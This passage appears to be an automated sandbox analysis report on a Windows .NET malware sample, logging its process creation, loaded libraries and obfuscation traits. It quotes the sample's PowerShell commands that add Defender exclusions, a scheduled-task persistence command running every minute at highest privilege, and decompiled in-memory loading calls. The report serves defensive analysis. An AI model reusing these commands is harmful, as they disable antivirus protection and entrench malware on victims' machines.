            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PjGz899RZV.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile read: C:\Users\user\Desktop\PjGz899RZV.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PjGz899RZV.exe "C:\Users\user\Desktop\PjGz899RZV.exe"
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe C:\Users\user\AppData\Roaming\PjGz899RZV.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\PjGz899RZV.exe C:\Users\user\AppData\Roaming\PjGz899RZV.exe
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\PjGz899RZV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: PjGz899RZV.lnk.0.drLNK file: ..\..\..\..\..\PjGz899RZV.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: PjGz899RZV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PjGz899RZV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: PjGz899RZV.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: PjGz899RZV.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: PjGz899RZV.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: PjGz899RZV.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: PjGz899RZV.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: PjGz899RZV.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: PjGz899RZV.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: PjGz899RZV.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: PjGz899RZV.exe, Messages.cs.Net Code: Memory
            Source: PjGz899RZV.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: PjGz899RZV.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: PjGz899RZV.exe.0.dr, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD345600BD pushad ; iretd 0_2_00007FFD345600C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3443D2A5 pushad ; iretd 2_2_00007FFD3443D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3445D2A5 pushad ; iretd 5_2_00007FFD3445D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345700BD pushad ; iretd 5_2_00007FFD345700C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3445D2A5 pushad ; iretd 8_2_00007FFD3445D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD345700BD pushad ; iretd 8_2_00007FFD345700C1
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 15_2_00007FFD345400BD pushad ; iretd 15_2_00007FFD345400C1
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 16_2_00007FFD345400BD pushad ; iretd 16_2_00007FFD345400C1
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 17_2_00007FFD345700BD pushad ; iretd 17_2_00007FFD345700C1
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 18_2_00007FFD345600BD pushad ; iretd 18_2_00007FFD345600C1
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile created: C:\Users\user\AppData\Roaming\PjGz899RZV.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
